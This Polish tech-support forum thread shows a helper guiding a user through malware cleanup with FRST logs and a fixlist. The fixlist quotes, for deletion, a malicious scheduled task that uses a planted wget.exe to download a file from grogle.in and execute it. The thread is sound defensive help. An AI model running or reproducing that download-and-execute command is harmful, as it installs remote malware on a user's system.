senfren
(Senfren 2)
#1
Witam mam z tym problem od zainstalowania programu Avast co chwila te komunikaty szału można dostać z tym
http://imagizer.imageshack.us/a/img912/1901/qHG2Mr.png
tu podaje wklejki z programu FRST
FRST.txt: http://www.wklej.org/id/1620550/
Addition.txt: http://www.wklej.org/id/1620547/
tyle zrobiłem reszty nie wiem co i jak więc proszę o pomoc
Atis
(Atis)
#2
Odinstaluj Search App by Ask .
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :
CloseProcesses:
HKLM-x32\...\Run: [ApnTBMon] => C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe [1949080 2014-12-19] (APN)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
Startup: C:\Users\Michał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDDlife.lnk
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
SearchScopes: HKU\S-1-5-21-1560509816-1853623272-2328866619-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF SearchPlugin: C:\Users\Michał\AppData\Roaming\Mozilla\Firefox\Profiles\by65yqpl.default\searchplugins\ask-search.xml
R2 APNMCP; C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe [177560 2014-12-19] (APN LLC.)
U3 DfSdkS; No ImagePath
U0 msahci; system32\drivers\msahci.sys
2015-02-02 09:42 - 2014-07-29 04:02 - 00000000 ____ D () C:\ProgramData\McAfee
2015-01-23 21:15 - 2015-01-23 21:15 - 00000000 ____ D () C:\Users\Michał\AppData\Local\AskPartnerNetwork
2015-01-23 21:15 - 2015-01-23 21:15 - 00000000 ____ D () C:\ProgramData\AskPartnerNetwork
2015-01-23 21:15 - 2015-01-23 21:15 - 00000000 ____ D () C:\ProgramData\APN
2015-01-23 21:15 - 2015-01-23 21:15 - 00000000 ____ D () C:\Program Files (x86)\AskPartnerNetwork
2015-01-17 16:12 - 2015-02-02 10:45 - 00024576 _____ () C:\ProgramData\dat.bmp
2015-01-09 20:59 - 2015-01-09 20:59 - 00401408 _____ () C:\ProgramData\wget.exe
Task: {26575DAD-9B38-47F4-811F-1CB2A93B9559} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=iFXHmJSBBG;CursorFXPlus211_setup.exe;1420833603 & start cmd /R dat.bmp <==== ATTENTION
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
EmptyTemp:
Uruchom FRST i kliknij Fix. Pokaż raport z usuwania Fixlog.
Kliknij Scan i pokaż nowy raport z FRST bez Addition.
senfren
(Senfren 2)
#3
Atis
(Atis)
#4
Skasuj folder C:\FRST
Usuń stare punkty przywracania: Przywracanie systemu i kopie w tle
Dysk przeskanuj Malwarebytes Anti-Malware
Podczas instalacji usuń zaznaczenie przy Uruchom okres testowy Malwarebytes Anti-Malware Premium.
http://wstaw.org/m/2014/03/25/2014-03-25_123039.png
Język PL > Settings > General Settings > Language > Polish
senfren
(Senfren 2)
#5
Dzięki wielkie za pomoc, problem znikną jak na razie